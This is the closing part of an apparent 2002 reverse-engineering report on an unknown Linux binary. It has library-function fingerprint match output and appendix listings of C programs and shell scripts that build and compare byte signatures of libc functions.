Fingerprint for address 0x805e4cc [Function_220] is EBFE7C1D

Searching in databases...

      1 match(es) found:

    MCGetMsg

 

Fingerprint for address 0x805e584 [Function_221] is 49E2A76D

Searching in databases...

      1 match(es) found:

    catgets

 

Fingerprint for address 0x805e640 [Function_222] is D58BBF3B

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e844 [Function_223] is EF59F36B

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e954 [Function_224] is 7CA86695

Searching in databases...

      1 match(es) found:

    libc_nls_init

 

Fingerprint for address 0x805e984 [Function_225] is 0430DD5B

Searching in databases...

      1 match(es) found:

    inet_ntoa

 

Fingerprint for address 0x805e9b8 [Function_226] is 8AC69732

Searching in databases...

    No match found.

 

Fingerprint for address 0x805eea4 [Function_227] is A7575293

Searching in databases...

    No match found.

 

Fingerprint for address 0x805efb0 [Function_228] is 28A81DB2

Searching in databases...

    No match found.

 

Fingerprint for address 0x805f1dc [Function_229] is 7FF177EB

Searching in databases...

    No match found.

 

Fingerprint for address 0x805f670 [Function_230] is A7C5F021

Searching in databases...

      1 match(es) found:

    fp_query

 

Fingerprint for address 0x805f68c [Function_231] is 01E05EDB

Searching in databases...

      1 match(es) found:

    p_cdnname

 

Fingerprint for address 0x805f730 [Function_232] is A0CB43A2

Searching in databases...

      1 match(es) found:

    p_fqname

 

Fingerprint for address 0x805f7e4 [Function_233] is F1ABE68D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060004 [Function_234] is 3B93883C

Searching in databases...

    No match found.

 

Fingerprint for address 0x80605d0 [Function_235] is A4040F60

Searching in databases...

      1 match(es) found:

    p_class

 

Fingerprint for address 0x8060630 [Function_236] is 3028DB04

Searching in databases...

      1 match(es) found:

    p_option

 

Fingerprint for address 0x806077c [Function_237] is 172CE6E6

Searching in databases...

    No match found.

 

Fingerprint for address 0x80608c8 [Function_238] is C2464C6C

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060ae8 [Function_239] is 76976AE6

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060bd8 [Function_240] is 05F278DD

Searching in databases...

      1 match(es) found:

    inet_nsap_ntoa

 

Fingerprint for address 0x8060d24 [Function_241] is 5DDE16CF

Searching in databases...

      1 match(es) found:

    file_init

 

Fingerprint for address 0x8060d44 [Function_242] is 1A9AB2FD

Searching in databases...

      1 match(es) found:

    file_close_it

 

Fingerprint for address 0x8060e20 [Function_243] is 79BE3825

Searching in databases...

    No match found.

 

Fingerprint for address 0x8060fa8 [Function_244] is D1E7CA6F

Searching in databases...

      1 match(es) found:

    do_write

 

Fingerprint for address 0x8061210 [Function_245] is 2E8534F6

Searching in databases...

      1 match(es) found:

    file_sync

 

Fingerprint for address 0x8061788 [Function_246] is 171A3304

Searching in databases...

      1 match(es) found:

    un_link

 

Fingerprint for address 0x80617c4 [Function_247] is D14AE427

Searching in databases...

      1 match(es) found:

    link_in

 

Fingerprint for address 0x80617e4 [Function_248] is CE3BB52E

Searching in databases...

      1 match(es) found:

    least_marker

 

Fingerprint for address 0x806180c [Function_249] is 8ABDC304

Searching in databases...

      1 match(es) found:

    switch_to_main_get_area

 

Fingerprint for address 0x806183c [Function_250] is B8FA5FA0

Searching in databases...

      1 match(es) found:

    switch_to_backup_area

 

Fingerprint for address 0x806186c [Function_251] is 3252A02C

Searching in databases...

      1 match(es) found:

    switch_to_get_mode

 

Fingerprint for address 0x80618d4 [Function_252] is AC602550

Searching in databases...

      1 match(es) found:

    free_backup_area

 

Fingerprint for address 0x8061910 [Function_253] is 955B1848

Searching in databases...

      1 match(es) found:

    overflow

 

Fingerprint for address 0x8061928 [Function_254] is DE985E20

Searching in databases...

    No match found.

 

Fingerprint for address 0x8061a70 [Function_255] is 77BACE64

Searching in databases...

      2 match(es) found:

    uflow underflow

 

Fingerprint for address 0x8061b6c [Function_256] is B9C49610

Searching in databases...

      1 match(es) found:

    setb

 

Fingerprint for address 0x8061bb8 [Function_257] is F5EC2329

Searching in databases...

      1 match(es) found:

    doallocbuf

 

Fingerprint for address 0x8061c2c [Function_258] is A849AD53

Searching in databases...

      1 match(es) found:

    default_xsputn

 

Fingerprint for address 0x8061d2c [Function_259] is 9CAD905E

Searching in databases...

      1 match(es) found:

    sgetn

 

Fingerprint for address 0x8061e44 [Function_260] is BDF1EE5D

Searching in databases...

      1 match(es) found:

    default_setbuf

 

Fingerprint for address 0x8061f34 [Function_261] is 1F614C30

Searching in databases...

      1 match(es) found:

    init

 

Fingerprint for address 0x8061fc0 [Function_262] is DAA3AE60

Searching in databases...

      1 match(es) found:

    default_finish

 

Fingerprint for address 0x80620c8 [Function_263] is CB206D2B

Searching in databases...

      1 match(es) found:

    adjust_column

 

Fingerprint for address 0x8062188 [Function_264] is E384EB54

Searching in databases...

      1 match(es) found:

    flush_all

 

Fingerprint for address 0x80621d0 [Function_265] is 8F264160

Searching in databases...

      1 match(es) found:

    flush_all_linebuffered

 

Fingerprint for address 0x8062204 [Function_266] is D47CF0F1

Searching in databases...

      1 match(es) found:

    unbuffer_all

 

Fingerprint for address 0x8062368 [Function_267] is 0AA1F400

Searching in databases...

      1 match(es) found:

    unsave_markers

 

Fingerprint for address 0x80623b8 [Function_268] is 6A302BBB

Searching in databases...

      1 match(es) found:

    default_pbackfail

 

Fingerprint for address 0x80624d0 [Function_269] is 74A57077

Searching in databases...

      1 match(es) found:

    fputs

 

Fingerprint for address 0x8062534 [Function_270] is 573BAB62

Searching in databases...

      1 match(es) found:

    padn

 

Fingerprint for address 0x80625dc [Function_271] is 98B42393

Searching in databases...

      1 match(es) found:

    perror

 

Fingerprint for address 0x806267c [Function_272] is 84FAD1E5

Searching in databases...

      1 match(es) found:

    seekoff

 

Fingerprint for address 0x80626c8 [Function_273] is AF6B5EBA

Searching in databases...

      2 match(es) found:

    fseek setbuffer

 

Fingerprint for address 0x8062714 [Function_274] is 6F0B92B5

Searching in databases...

      1 match(es) found:

    itoa

 

Fingerprint for address 0x8062888 [Function_275] is 4BC4782B

Searching in databases...

      1 match(es) found:

    snprintf

 

Fingerprint for address 0x80628a8 [Function_276] is 5B85F0B2

Searching in databases...

      1 match(es) found:

    vsnprintf

 

Fingerprint for address 0x80628f8 [Function_277] is 5259B775

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062940 [Function_278] is F6B92000

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062c9c [Function_279] is E0D238D7

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062cc8 [Function_280] is 74624A3B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062cf8 [Function_281] is A92410A7

Searching in databases...

    No match found.

 

Fingerprint for address 0x8062d4c [Function_282] is 08D6DF05

Searching in databases...

      1 match(es) found:

    setlocale

 

Fingerprint for address 0x806364c [Function_283] is 0798135C

Searching in databases...

      3 match(es) found:

    ctime gsignal raise

 

Fingerprint for address 0x8063664 [Function_284] is 0382EDDB

Searching in databases...

    No match found.

 

Fingerprint for address 0x8063688 [Function_285] is E11BCBDF

Searching in databases...

      1 match(es) found:

    clnt_sperror

 

Fingerprint for address 0x8063894 [Function_286] is 092C4216

Searching in databases...

    No match found.

 

Fingerprint for address 0x80638b8 [Function_287] is C6611067

Searching in databases...

      1 match(es) found:

    clnt_sperrno

 

Fingerprint for address 0x8063958 [Function_288] is E8BB9C9D

Searching in databases...

      1 match(es) found:

    clnt_spcreateerror

 

Fingerprint for address 0x8063a74 [Function_289] is C6611067

Searching in databases...

      1 match(es) found:

    clnt_sperrno

 

Fingerprint for address 0x8063b04 [Function_290] is ACC31831

Searching in databases...

      1 match(es) found:

    clnttcp_create

 

Fingerprint for address 0x80641c8 [Function_291] is 8C7640B5

Searching in databases...

      1 match(es) found:

    clntudp_bufcreate

 

Fingerprint for address 0x8064400 [Function_292] is 13D81344

Searching in databases...

      1 match(es) found:

    clntudp_create

 

Fingerprint for address 0x80649c0 [Function_293] is 2F086590

Searching in databases...

    No match found.

 

Fingerprint for address 0x80649e0 [Function_294] is 54790C88

Searching in databases...

      1 match(es) found:

    pmap_getport

 

Fingerprint for address 0x8064b1c [Function_295] is 7A0457B0

Searching in databases...

      1 match(es) found:

    xdr_opaque_auth

 

Fingerprint for address 0x8064c48 [Function_296] is 2AF4A336

Searching in databases...

     48 match(es) found:

    xdr_accepted_reply xdr_authdes_cred xdr_authunix_parms xdr_cp_result xdr_cryptkeyarg xdr_cryptkeyarg2 xdr_cryptkeyres xdr_directory_obj xdr_dump_args xdr_entry_col xdr_fd_args xdr_fd_result xdr_getcredres xdr_group_obj xdr_key_netstarg xdr_key_netstres xdr_link_obj xdr_log_entry xdr_log_result xdr_nis_object xdr_nis_oid xdr_nis_result xdr_nis_server xdr_nis_tag xdr_ns_request xdr_oar_mask xdr_objdata xdr_opaque_auth xdr_ping_args xdr_pmap xdr_rejected_reply xdr_replymsg xdr_unixcred xdr_ypbind_resp xdr_ypbind_setdom xdr_ypmap_parms xdr_ypmaplist xdr_yppushresp_xfr xdr_ypreq_key xdr_ypreq_nokey xdr_ypreq_xfr xdr_ypresp_all xdr_ypresp_key_val xdr_ypresp_maplist xdr_ypresp_master xdr_ypresp_order xdr_ypresp_val xdr_ypresp_xfr

 

Fingerprint for address 0x8064c9c [Function_297] is 937FD516

Searching in databases...

      1 match(es) found:

    xdr_callhdr

 

Fingerprint for address 0x8064d14 [Function_298] is 4DF3B83F

Searching in databases...

    No match found.

 

Fingerprint for address 0x8064da0 [Function_299] is 4FC29B38

Searching in databases...

    No match found.

 

Fingerprint for address 0x8064de0 [Function_300] is 9250CDB9

Searching in databases...

      1 match(es) found:

    seterr_reply

 

Fingerprint for address 0x8064e74 [Function_301] is 1B7D7AA6

Searching in databases...

      1 match(es) found:

    xdr_free

 

Fingerprint for address 0x8064ea0 [Function_302] is 67416E4C

Searching in databases...

      5 match(es) found:

    hol_entry_qcmp setmntent xdr_int xdr_longlong_t xdr_u_int

 

Fingerprint for address 0x8064eb4 [Function_303] is 67416E4C

Searching in databases...

      5 match(es) found:

    hol_entry_qcmp setmntent xdr_int xdr_longlong_t xdr_u_int

 

Fingerprint for address 0x8064ec8 [Function_304] is F10AB3BA

Searching in databases...

      1 match(es) found:

    xdr_long

 

Fingerprint for address 0x8064f10 [Function_305] is 0D74E12B

Searching in databases...

      1 match(es) found:

    xdr_u_long

 

Fingerprint for address 0x8064fbc [Function_306] is 9F03A37F

Searching in databases...

      4 match(es) found:

    xdr_int16_t xdr_int8_t xdr_short xdr_u_short

 

Fingerprint for address 0x8065098 [Function_307] is F34C4CFA

Searching in databases...

      3 match(es) found:

    xdr_bool xdr_short xdr_u_short

 

Fingerprint for address 0x806510c [Function_308] is 24780A3B

Searching in databases...

      1 match(es) found:

    xdr_enum

 

Fingerprint for address 0x8065120 [Function_309] is 3E801353

Searching in databases...

      1 match(es) found:

    xdr_opaque

 

Fingerprint for address 0x80651b8 [Function_310] is E242F89E

Searching in databases...

      1 match(es) found:

    xdr_bytes

 

Fingerprint for address 0x806529c [Function_311] is 23A8E9D8

Searching in databases...

      1 match(es) found:

    xdr_union

 

Fingerprint for address 0x8065304 [Function_312] is 89A1B37A

Searching in databases...

      1 match(es) found:

    xdr_string

 

Fingerprint for address 0x8065408 [Function_313] is CB4144ED

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065588 [Function_314] is 93AD4225

Searching in databases...

    No match found.

 

Fingerprint for address 0x80655f0 [Function_315] is 4C0AD4DD

Searching in databases...

      1 match(es) found:

    fill_input_buf

 

Fingerprint for address 0x8065634 [Function_316] is 077ECC69

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065698 [Function_317] is 0E5C23A2

Searching in databases...

    No match found.

 

Fingerprint for address 0x80656e8 [Function_318] is 7FD74F36

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065734 [Function_319] is B0CF02A0

Searching in databases...

      1 match(es) found:

    fix_buf_size

 

Fingerprint for address 0x8065750 [Function_320] is CD2F801F

Searching in databases...

      1 match(es) found:

    xdrrec_create

 

Fingerprint for address 0x8065910 [Function_321] is 2AE969F5

Searching in databases...

    No match found.

 

Fingerprint for address 0x80659ec [Function_322] is 19F79418

Searching in databases...

      1 match(es) found:

    xdrrec_getpos

 

Fingerprint for address 0x8065b2c [Function_323] is 64E11C5A

Searching in databases...

      1 match(es) found:

    xdrrec_skiprecord

 

Fingerprint for address 0x8065be4 [Function_324] is 57EBF3F7

Searching in databases...

      1 match(es) found:

    xdrrec_endofrecord

 

Fingerprint for address 0x8065c48 [Function_325] is DE49DF2E

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065c54 [Function_326] is 8A519643

Searching in databases...

      1 match(es) found:

    sigsetmask

 

Fingerprint for address 0x8065c84 [Function_327] is 054B8B45

Searching in databases...

      2 match(es) found:

    getdomainname gethostname

 

Fingerprint for address 0x8065cec [Function_328] is 9BFFD811

Searching in databases...

      1 match(es) found:

    mmap

 

Fingerprint for address 0x8065d50 [Function_329] is 3C33B549

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065d8c [Function_330] is 01D367C9

Searching in databases...

    No match found.

 

Fingerprint for address 0x8065e1c [Function_331] is 1D651E11

Searching in databases...

    No match found.

 

Fingerprint for address 0x80660f4 [Function_332] is 696A42B5

Searching in databases...

      2 match(es) found:

    fcntl libc_fcntl

 

Fingerprint for address 0x8066124 [Function_333] is 41C566DB

Searching in databases...

      2 match(es) found:

    libc_lseek lseek

 

Fingerprint for address 0x8066154 [Function_334] is 3103283A

Searching in databases...

      2 match(es) found:

    libc_munmap munmap

 

Fingerprint for address 0x8066180 [Function_335] is 8DEC47E7

Searching in databases...

      2 match(es) found:

    libc_syscall_readv syscall_readv

 

Fingerprint for address 0x80661b0 [Function_336] is DC88EC56

Searching in databases...

      2 match(es) found:

    libc_mremap mremap

 

Fingerprint for address 0x80661e8 [Function_337] is B5A1EA26

Searching in databases...

    No match found.

 

Fingerprint for address 0x8066230 [Function_338] is 56C8C313

Searching in databases...

    No match found.

 

Fingerprint for address 0x806626c [Function_339] is AC5AFA8C

Searching in databases...

      1 match(es) found:

    bzero

 

Fingerprint for address 0x80662b0 [Function_340] is 8C70DBBF

Searching in databases...

      1 match(es) found:

    strlen

 

Fingerprint for address 0x8066380 [Function_341] is 618AE777

Searching in databases...

      2 match(es) found:

    mpn_add_n mpn_sub_n

 

Fingerprint for address 0x8066420 [Function_342] is 8A34610C

Searching in databases...

      3 match(es) found:

    mpn_addmul_1 mpn_mul_1 mpn_submul_1

 

Fingerprint for address 0x8066464 [Function_343] is A4E6672B

Searching in databases...

      1 match(es) found:

    xdr_domainname

 

Fingerprint for address 0x8066490 [Function_344] is D18C9A99

Searching in databases...

      3 match(es) found:

    xdr_domainname xdr_mapname xdr_peername

 

Fingerprint for address 0x80664b8 [Function_345] is 592BE8E9

Searching in databases...

      1 match(es) found:

    xdr_peername

 

Fingerprint for address 0x80664e4 [Function_346] is C8C74AE4

Searching in databases...

      1 match(es) found:

    xdr_datum

 

Fingerprint for address 0x80665dc [Function_347] is 2AF4A336

Searching in databases...

     48 match(es) found:

    xdr_accepted_reply xdr_authdes_cred xdr_authunix_parms xdr_cp_result xdr_cryptkeyarg xdr_cryptkeyarg2 xdr_cryptkeyres xdr_directory_obj xdr_dump_args xdr_entry_col xdr_fd_args xdr_fd_result xdr_getcredres xdr_group_obj xdr_key_netstarg xdr_key_netstres xdr_link_obj xdr_log_entry xdr_log_result xdr_nis_object xdr_nis_oid xdr_nis_result xdr_nis_server xdr_nis_tag xdr_ns_request xdr_oar_mask xdr_objdata xdr_opaque_auth xdr_ping_args xdr_pmap xdr_rejected_reply xdr_replymsg xdr_unixcred xdr_ypbind_resp xdr_ypbind_setdom xdr_ypmap_parms xdr_ypmaplist xdr_yppushresp_xfr xdr_ypreq_key xdr_ypreq_nokey xdr_ypreq_xfr xdr_ypresp_all xdr_ypresp_key_val xdr_ypresp_maplist xdr_ypresp_master xdr_ypresp_order xdr_ypresp_val xdr_ypresp_xfr

 

Fingerprint for address 0x80666a0 [Function_348] is 2AF4A336

Searching in databases...

     48 match(es) found:

    xdr_accepted_reply xdr_authdes_cred xdr_authunix_parms xdr_cp_result xdr_cryptkeyarg xdr_cryptkeyarg2 xdr_cryptkeyres xdr_directory_obj xdr_dump_args xdr_entry_col xdr_fd_args xdr_fd_result xdr_getcredres xdr_group_obj xdr_key_netstarg xdr_key_netstres xdr_link_obj xdr_log_entry xdr_log_result xdr_nis_object xdr_nis_oid xdr_nis_result xdr_nis_server xdr_nis_tag xdr_ns_request xdr_oar_mask xdr_objdata xdr_opaque_auth xdr_ping_args xdr_pmap xdr_rejected_reply xdr_replymsg xdr_unixcred xdr_ypbind_resp xdr_ypbind_setdom xdr_ypmap_parms xdr_ypmaplist xdr_yppushresp_xfr xdr_ypreq_key xdr_ypreq_nokey xdr_ypreq_xfr xdr_ypresp_all xdr_ypresp_key_val xdr_ypresp_maplist xdr_ypresp_master xdr_ypresp_order xdr_ypresp_val xdr_ypresp_xfr

 

Fingerprint for address 0x80666e8 [Function_349] is 20211222

Searching in databases...

      1 match(es) found:

    xdr_ypmaplist_str

 

Fingerprint for address 0x8066798 [Function_350] is 5B2EEDA4

Searching in databases...

      5 match(es) found:

    xdr_keystatus xdr_ypbind_resptype xdr_yppush_status xdr_ypstat xdr_ypxfrstat

 

Fingerprint for address 0x80667c0 [Function_351] is 16773894

Searching in databases...

      1 match(es) found:

    xdr_ypbind_binding

 

Fingerprint for address 0x8066a50 [Function_352] is 7F9A5675

Searching in databases...

      1 match(es) found:

    bindresvport

 

Fingerprint for address 0x8066bfc [Function_353] is 440F7473

Searching in databases...

      1 match(es) found:

    nl_load_locale

 

Fingerprint for address 0x8067040 [Function_354] is C96D8E46

Searching in databases...

      1 match(es) found:

    nl_free_locale

 

Fingerprint for address 0x8067094 [Function_355] is 852FF55C

Searching in databases...

      1 match(es) found:

    authnone_create

 

Fingerprint for address 0x80671a4 [Function_356] is 051FB1D6

Searching in databases...

      1 match(es) found:

    xdr_reference

 

Fingerprint for address 0x8067248 [Function_357] is E487C5B3

Searching in databases...

      1 match(es) found:

    xdr_pointer

 

Fingerprint for address 0x80672ac [Function_358] is 5C362736

Searching in databases...

      1 match(es) found:

    isatty

 

Fingerprint for address 0x80672e0 [Function_359] is 9F537EA9

Searching in databases...

      1 match(es) found:

    tcgetattr

 

Fingerprint for address 0x8067300 [Function_360] is FB8A10B7

Searching in databases...

      1 match(es) found:

    stpcpy

 

Fingerprint for address 0x8067344 [Function_361] is 9037061A

Searching in databases...

    No match found.

 

Fingerprint for address 0x806744c [Function_362] is 2CF88E3A

Searching in databases...

    No match found.

 

Fingerprint for address 0x80675a8 [Function_363] is 72DDE54A

Searching in databases...

    No match found.

 

Fingerprint for address 0x840d21ba [Function_364] is E4094AD2

Searching in databases...

    No match found.

 

./checkf finished at Wed May 22 22:29:55 CEST 2002

Analysis of /root/chroot/reverse/the-binary done.

364 functions analyzed.

240 functions matched.

 



 


Appendix 14: aprint2.c program listing

 

/*

   afprint2.c

*/

 

#include <string.h>

#include <stdlib.h>

#include <unistd.h>

#include <stdio.h>

#include <fcntl.h>

#include <bfd.h>

//#include <libiberty.h>

 

#define SIGNATSIZE 100

 

unsigned char buf[SIGNATSIZE+4];

 

#define CODESEG (((unsigned int)buf) >> 24)

 

unsigned int result[4];

 

int main(int argc,char* argv[]) {

  int f,summ=0;

  asymbol** syms;

  int size,symcnt,i,off;

  bfd* b;

  char tagme=0;

  int ret;

  int num;

 

        bzero(buf,sizeof(buf));

   for (num=0;num<SIGNATSIZE;num++) {

         scanf("%2x",&ret);

         buf[num]=ret;

   }

 

        for (f=2;f<SIGNATSIZE;f++) {

          // This ain't no stinkin' code!

          if ((buf[f-2]==0x90) && (buf[f-1]==0x90) && (buf[f] == 0x90)) {

            buf[f-2]=0; buf[f-1]=0;

            tagme=1;

          }

          if (tagme) buf[f]=0;

        }

 

        // For sanity.

        for (f=0;f<SIGNATSIZE;f++)

         if (buf[f]==CODESEG) bzero(&buf[f-3],4);

 

        for (f=0;f<SIGNATSIZE;f++)

         if (buf[f]==0xe8) bzero(&buf[f+1],4);

 

        for (f=0;f<SIGNATSIZE;f++) printf("%02X ",buf[f]);

        printf("\n");

 

 

 

  return 0;

 

}

 



 


Appendix 15: fprints2.c program listing

 

/*

  fprints2.c

 

  compile with cc fprints2.c -o fprints2 -lbfd -liberty

*/

 

#include <string.h>

#include <stdlib.h>

#include <unistd.h>

#include <stdio.h>

#include <fcntl.h>

#include <bfd.h>

 

 

#define SIGNATSIZE 100

 

unsigned char buf[SIGNATSIZE+4];

 

#define CODESEG (((unsigned int)buf) >> 24)

 

unsigned int result[4];

 

int main(int argc,char* argv[]) {

  int f,summ=0;

  asymbol** syms;

  int size,symcnt,i,off;

  bfd* b;

 

  if (argc-2) {

    fprintf(stderr,"function signatures\n");

    fprintf(stderr,"Usage: %s elf_object\n",argv[0]);

    exit(1);

  }

 

  b = bfd_openr(argv[1],0);

  if (!b) { fprintf(stderr,"bfd_openr failed\n"); exit(1); }

 

  bfd_check_format(b,bfd_archive);

  bfd_check_format_matches(b,bfd_object,0);

 

  if ((bfd_get_file_flags(b) & HAS_SYMS) == 0) {

    fprintf(stderr,"No symbols.\n");

    exit(1);

  }

 

  size=bfd_get_symtab_upper_bound(b);

  syms=(asymbol**)malloc(size);

  symcnt=bfd_canonicalize_symtab(b,syms);

 

  for (i=0;i<symcnt;i++) {

 

    if (syms[i]->flags & BSF_FUNCTION) {

      char name[500],*fiu;

 

      strcpy(name,(char*)(bfd_asymbol_name(syms[i])));

      if ((fiu=strstr(&name[2],"__")))

        if (*(fiu-1)!='_') *fiu=0;

 

      if ((fiu=strchr(name+1,'@'))) *fiu=0;

 

      if (!strlen(name)) continue;

 

      off=syms[i]->value;

      if (syms[i]->section) off+=syms[i]->section->filepos;

 

      {

        char tagme=0;

        printf("[%s+%d] %s ",argv[1],off,name);

        f=open(argv[1],O_RDONLY);

        lseek(f,off,SEEK_SET);

        summ++;

        bzero(buf,sizeof(buf));

        read(f,buf,SIGNATSIZE);

 

        for (f=2;f<SIGNATSIZE;f++) {

          // This ain't no stinkin' code!

          if ((buf[f-2]==0x90) && (buf[f-1]==0x90) && (buf[f] == 0x90)) {

            buf[f-2]=0; buf[f-1]=0;

            tagme=1;

          }

          if (tagme) buf[f]=0;

        }

 

        // For sanity.

        for (f=0;f<SIGNATSIZE;f++)

         if (buf[f]==CODESEG) bzero(&buf[f-3],4);

 

        for (f=0;f<SIGNATSIZE;f++)

         if (buf[f]==0xe8) bzero(&buf[f+1],4);

 

        for (f=0;f<SIGNATSIZE;f++) printf("%02X ",buf[f]);

        printf("\n");

 

      }

    }

  }

 

  if (getenv("FANCY")) fprintf(stderr,"%d function%s",summ,summ==1?"":"s");

  else fprintf(stderr,"--> %s: done (%d function%s)\n",argv[1],summ,

               summ==1?"":"s");

 

  return 0;

 

}

 



 


Appendix 16: getfprints2  script

 

 

#!/bin/bash

#

 

TRYLIBS="/usr/lib/libc.a /usr/lib/libm.a /usr/lib/libdl.a \

         /usr/lib/libresolv.a /usr/lib/libreadline.a /usr/lib/libtermcap.a \

         /usr/lib/libssl.a /usr/lib/libBrokenLocale.a \

         /usr/lib/libcrypt.a"

TRYLIBS="/usr/lib/libm.a"

 

if [ ! "$1" = "" ]; then

  TRYLIBS="$1"

fi

 

if [ "$NOBANNER" = "" ]; then

  echo "auto library function signature collector"

fi

 

export FANCY=1

ACNT=0

FCNT=0

O=NEW-fnprints.dat

 

PATH=$PATH:.

 

echo -n >$O

 

TRYTHEM=""

 

for i in $TRYLIBS; do

  test -f $i && TRYTHEM="$TRYTHEM $i"

done

 

FCOUNT=`echo $TRYTHEM|wc -w`

 

if [ "$FCOUNT" = "0" ]; then

  echo "No usable libraries. Tried the following: $TRYLIBS."

  exit 1

fi

 

fprints2 &>/dev/null

 

if [ ! "$?" = "1" ]; then

  echo "Cannot find 'fprints2' in your path or in current directory."

  exit 1

fi

 

CAR=0

 

for i in $TRYTHEM; do

  CAR=$[CAR+1]

 

  MIAU=`basename $i`

 

  LIST=`ar t $i`

  IC=`echo $LIST | wc -w`

  ACNT=$[ACNT+1]

  IN=0

 

  for j in $LIST; do

    IN=$[IN+1]

    ar x $i $j

    echo -n "[$CAR/$[FCOUNT]] [$[IN*100/IC]%] $MIAU:$j - "

    fprints2 $j >>$O

    rm -f $j

    echo -ne "                   \r"

    FCNT=$[FCNT+1]

  done

done

 

exit



 


Appendix 17: checka2  script

 

#!/bin/sh

 

DATABASES="*.dat support/*.dat"

DATABASES="AAA.dat"

SIGNATURESIZE=100

RELEVANT=80

 

if [ $# -lt 2 ]

then

   echo "usage: $0 <address to check in databases> <binary file> <function name>"

   exit 1

fi

type objdump >/dev/null 2>&1

if [ $? -ne 0 ]

then

   echo I need objdump command in your PATH

   exit 1

fi

type afprint2 >/dev/null 2>&1

if [ $? -ne 0 ]

then

   type ./afprint2 >/dev/null 2>&1

   if [ $? -ne 0 ]

   then

         echo I need afprint2 executable to be in your PATH

         exit 1

   else

         AFPRINT=./afprint2

   fi

else

   AFPRINT=afprint2

fi

 

FPRINT=`objdump -d --start-address $1 $2 2>/dev/null| tail +8 | cut -c10- | cut -c-23 | $AFPRINT`

echo ""

if [ $# -lt 3 ]

then

echo Fingerprint for address $1 is $FPRINT

else

echo Fingerprint for address $1 [$3] is $FPRINT

fi

echo "Searching in databases for a similar ($RELEVANT%) function... (this can take a while)"

echo ""

 

for D in $DATABASES

do

{

NF=`wc -l $D|awk '{print $1}'`

let N=1

while [ $N -le $NF ]

do

   CMATCH=1

   read LINE

   FNAME=`echo $LINE|cut -d' ' -f2`

   SIG=`echo $LINE|cut -d' ' -f3-`

   NMATCHED=0

   echo -ne "                                                        \r"

   echo -ne "$D: [$N/$NF] Testing $FNAME...\r"

   while [ $CMATCH -le $SIGNATURESIZE ]

   do

         C1=`echo $FPRINT|cut -d' ' -f$CMATCH`

         C2=`echo $SIG|cut -d' ' -f$CMATCH`

         if [ "$C1" = "$C2" ]

         then

                let NMATCHED=NMATCHED+1

         fi

                let CMATCH=CMATCH+1

   done

   if [ $NMATCHED -ge $RELEVANT ]

   then

         echo "$FNAME matched with ${NMATCHED}%                         "

         let RESULT=RESULT+1

   fi

   let N=N+1

done

} < $D

done

if [ $RESULT -eq 0 ]

then

   echo No match found.

else

   echo "$RESULT possible matches found with correlation > $RELEVANT%."

fi

echo ""

exit 0

 



 


References

 

Additional references:

 

[1]       www.datarescue.com, the IDA makers.

[2]       www.foundstone.com

[3]       http://www.packetfactory.net/libnet